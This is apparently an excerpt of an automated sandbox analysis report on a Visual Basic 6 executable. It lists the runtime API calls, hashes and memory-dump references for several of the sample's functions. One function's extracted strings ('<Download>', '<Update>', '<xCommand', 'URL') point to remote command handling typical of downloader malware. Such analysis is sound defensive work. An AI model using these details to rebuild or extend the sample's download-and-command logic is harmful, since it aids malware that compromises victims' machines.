                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004159F9
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00415A02
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415A0A
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415A13
                                                                                                                                                                                  • #594.MSVBVM60(0000000A), ref: 00415A37
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00415A40
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,000000FF,00000000), ref: 00415A5C
                                                                                                                                                                                  • #593.MSVBVM60(0000000A), ref: 00415A86
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00415AAF
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00415ABD
                                                                                                                                                                                  • __vbaFpUI1.MSVBVM60 ref: 00415ADF
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00415AF7
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60 ref: 00415B1F
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415B6D
                                                                                                                                                                                  • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415B79
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • #593.MSVBVM60(0000000A), ref: 00415BB3
                                                                                                                                                                                  • __vbaFpI4.MSVBVM60 ref: 00415BD5
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00415BE0
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60 ref: 00415BF4
                                                                                                                                                                                  • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00415C0C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415C17
                                                                                                                                                                                  • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415C23
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415C42
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00415C51
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415C55
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415C5E
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415C63
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00415C6C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00415C70
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00415C73
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 00415C7C
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,00415D0C), ref: 00415CE6
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00415CF5
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00415CFA
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00415CFF
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00415D04
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 00415D28
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Move$Error$File$#516#631BstrCopyPut3$#525$#593#594#648BoundsCloseGenerateGet3Get4ListOpenOwner3RedimSystem$#537#570#616#618DestructExitOverflowPreserveProcSeek
                                                                                                                                                                                  • String ID: 0000
                                                                                                                                                                                  • API String ID: 292954213-211534962
                                                                                                                                                                                  • Opcode ID: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
                                                                                                                                                                                  • Instruction ID: 53a986e52e39fbf970cbf615d3a1ec69ca294c6c8782ac2c6b5e72a9cd1184f1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0122DB1E00248DFDB14DBE4DD89ADDBBB5FF88301F10412AE506A72A0DB745985CF59
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00411D10 Relevance: 143.9, APIs: 81, Strings: 1, Instructions: 403COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 00411D2E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D5B
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 00411D6A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411D80
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D8B
                                                                                                                                                                                    • Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                                                    • Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                                                    • Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                                                    • Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000000,?,00000000,004025E6), ref: 00411D9D
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411DB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411DBE
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 004156CA
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 004156D2
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaOnError.MSVBVM60(00000001), ref: 004156D6
                                                                                                                                                                                    • Part of subcall function 00415660: #648.MSVBVM60(0000000A), ref: 004156EE
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaFreeVar.MSVBVM60 ref: 004156FD
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaI2I4.MSVBVM60(?), ref: 0041570F
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415721
                                                                                                                                                                                    • Part of subcall function 00415660: #570.MSVBVM60(00000000), ref: 00415724
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 00415753
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaStrMove.MSVBVM60(?), ref: 00415769
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaFreeStr.MSVBVM60 ref: 0041576E
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
                                                                                                                                                                                    • Part of subcall function 00415660: #525.MSVBVM60(00000000), ref: 00415789
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaStrMove.MSVBVM60 ref: 00415794
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415799
                                                                                                                                                                                    • Part of subcall function 00415660: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004025E6), ref: 00411DDF
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406C74,00000006,00000006,?,00000000,?,00000000,004025E6), ref: 00411E04
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E0F
                                                                                                                                                                                  • #580.MSVBVM60(00000000,?,00000000,?,00000000,004025E6), ref: 00411E16
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E1F
                                                                                                                                                                                  • #598.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E2C
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004043C4,0041B024,0041B09C,?,00000000,?,00000000,004025E6), ref: 00411E5D
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411E97
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,?), ref: 00411EB8
                                                                                                                                                                                  • __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0041B09C,00000000,?,00000020), ref: 00411EDE
                                                                                                                                                                                  • #598.MSVBVM60(?,00000000,004025E6), ref: 00411EEE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,004025E6), ref: 00411F10
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406C74,?,00000000,?,00000000,004025E6), ref: 00411F2C
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 00411F37
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00000000,?,00000000,004025E6), ref: 00411F46
                                                                                                                                                                                  • #598.MSVBVM60(?,00000000,004025E6), ref: 00411F53
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00411F72
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00411F81
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406C74,?), ref: 00411F97
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(004123A7), ref: 00412397
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 004123A0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Move$CopyError$#598$#580#648BstrChkstk$#525#529#570FileGet4ListNew2OpenSystem
                                                                                                                                                                                  • String ID: 5
                                                                                                                                                                                  • API String ID: 3012955283-2226203566
                                                                                                                                                                                  • Opcode ID: 4c51faa2736fb7085ee1db596ec4db0ff330f662fb4349c4903174346d8d8e19
                                                                                                                                                                                  • Instruction ID: b2978daf75234b14887ffa37483130b8305288e28cd3c1483e6757a63013c22d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c51faa2736fb7085ee1db596ec4db0ff330f662fb4349c4903174346d8d8e19
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9302E771900248EFDB04DFE0DE58BDEBBB5FB48305F108169E606B76A0DB781A85DB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040F1D0 Relevance: 133.5, APIs: 66, Strings: 10, Instructions: 460COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,0040AA6C,0041B090), ref: 0040F1EE
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040F21E
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
                                                                                                                                                                                    • Part of subcall function 0040FA50: #648.MSVBVM60(0000000A), ref: 0040FABD
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaFreeVar.MSVBVM60 ref: 0040FACA
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
                                                                                                                                                                                    • Part of subcall function 0040FA50: #570.MSVBVM60(?), ref: 0040FAFB
                                                                                                                                                                                    • Part of subcall function 0040FA50: #525.MSVBVM60(00000000), ref: 0040FB02
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaStrMove.MSVBVM60 ref: 0040FB0D
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaFileClose.MSVBVM60(?), ref: 0040FB37
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaStrCopy.MSVBVM60 ref: 0040FB4A
                                                                                                                                                                                    • Part of subcall function 0040FA50: __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(0040AA6C,?,?,?,00000000,004025E6), ref: 0040F239
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F24D
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F256
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F267
                                                                                                                                                                                  • #712.MSVBVM60(00000000,0040728C,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F291
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F29C
                                                                                                                                                                                  • #712.MSVBVM60(00000000,00407294,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F2BD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F2C8
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2E2
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2FF
                                                                                                                                                                                  • #712.MSVBVM60(00000000,004072A0,004072B8,00000001,000000FF,00000000), ref: 0040F33A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040F345
                                                                                                                                                                                  • #712.MSVBVM60(00000000,004072AC,004072C0,00000001,000000FF,00000000), ref: 0040F366
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040F371
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001), ref: 0040F38B
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001), ref: 0040F3A8
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,<xCommand,00000001,00000001), ref: 0040F3CA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Free$#712$#516#631BstrChkstkErrorFile$#525#570#648CloseCopyGet3Open
                                                                                                                                                                                  • String ID: 8$</Download>$</Update>$</xCommand>$<Download>$<Update>$<xCommand$Param$URL$Version
                                                                                                                                                                                  • API String ID: 3601514899-954089795
                                                                                                                                                                                  • Opcode ID: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
                                                                                                                                                                                  • Instruction ID: 2d68e6c41ca87c00c381124143961c125374000113fd64c2ef600be50ae681ef
                                                                                                                                                                                  • Opcode Fuzzy Hash: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0012ED71900208EFDB14DFE0DE49BDDBBB5BB48305F208179E502BB2A4DB795A49CB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004111A0 Relevance: 103.8, APIs: 69, Instructions: 297COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(00000000,00000000), ref: 004111FE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00411206
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 0041120A
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00411222
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00411231
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 00411243
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000000), ref: 0041124A
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411252
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00411255
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411262
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411287
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 0041128E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00411299
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004112A1
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004112A5
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004112AD
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004112B6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004112EF
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000), ref: 004112F2
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041130F
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411471
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 0041147A
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041147E
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00411487
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00411495
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004112DE
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004112C4
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411323
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00411326
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411339
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 0041133D
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00411355
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00411364
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 00411370
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041137A
                                                                                                                                                                                  • #525.MSVBVM60(00001000), ref: 00411385
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00411390
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411398
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 0041139B
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004113D2
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004113DB
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004113E3
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004113EC
                                                                                                                                                                                  • #598.MSVBVM60 ref: 00411404
                                                                                                                                                                                  • #525.MSVBVM60(-00000001), ref: 00411424
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041142F
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411437
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00411440
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411448
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00411451
                                                                                                                                                                                  • #598.MSVBVM60 ref: 0041145E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004114A9
                                                                                                                                                                                    • Part of subcall function 0040EAB0: #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0040EB1A
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                                                    • Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                                                    • Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004114BD
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004114C5
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004114CE
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004114E2
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004114ED
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 004114F0
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 004114F9
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041150F
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00411518
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041151D
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00411520
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 00411529
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00411572), ref: 00411560
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00411565
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0041156A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0041156F
